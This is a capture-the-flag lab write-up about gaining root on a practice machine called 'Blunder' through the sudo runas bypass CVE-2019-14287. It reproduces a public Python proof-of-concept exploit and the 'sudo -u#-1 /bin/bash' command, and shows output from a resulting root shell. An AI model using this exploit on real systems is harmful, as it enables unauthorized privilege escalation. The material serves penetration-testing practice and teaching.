InfoSec LAB

Blunder_Privilege_Escalation

Created: 3 min read

CVE-2019-14287

a vulnerability was found in sudo up to 1.8.27 (Operating System Utility Software). It has been rated as critical. Affected by this issue is an unknown part of the component Runas Restriction Handler. The manipulation with the input value -1/4294967295 leads to a input validation vulnerability. Using CWE to declare the problem leads to CWE-20. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Impacted is confidentiality, integrity, and availability.

hugo@blunder:/$ sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1

As discovered previously, the sudo instance in the target system fits description of the vulnerability

exploit

# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287
 
'''Check for the user sudo permissions
 
sudo -l 
 
User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash
 
 
So user hacker can't run /bin/bash as root (!root)
 
 
User hacker sudo privilege in /etc/sudoers
 
# User privilege specification
root    ALL=(ALL:ALL) ALL
 
hacker ALL=(ALL,!root) /bin/bash
 
 
With ALL specified, user hacker can run the binary /bin/bash as any user
 
EXPLOIT: 
 
sudo -u#-1 /bin/bash
 
Example : 
 
hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#
 
Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id
 
and /bin/bash is executed with root permission
Proof of Concept Code :
 
How to use :
python3 sudo_exploit.py
 
'''
 
 
#!/usr/bin/python3
 
import os
 
#Get current username
 
username = input("Enter current username :")
 
 
#check which binary the user can run with sudo
 
os.system("sudo -l > priv")
 
 
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
 
binary_file = open("binary")
 
binary= binary_file.read()
 
#execute sudo exploit
 
print("Lets hope it works")
 
os.system("sudo -u#-1 "+ binary)

Exploit available via ExploitDB

Exploitation

hugo@blunder:/$ sudo -u#-1 /bin/bash
root@blunder:/#
root@blunder:/# whoami
root
root@blunder:/# hostname
blunder
root@blunder:/# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.191  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:30a  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:30a  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:0a  txqueuelen 1000  (Ethernet)
        RX packets 4718175  bytes 412410735 (412.4 MB)
        RX errors 0  dropped 151  overruns 0  frame 0
        TX packets 3613887  bytes 2490061668 (2.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 25757  bytes 2286043 (2.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 25757  bytes 2286043 (2.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks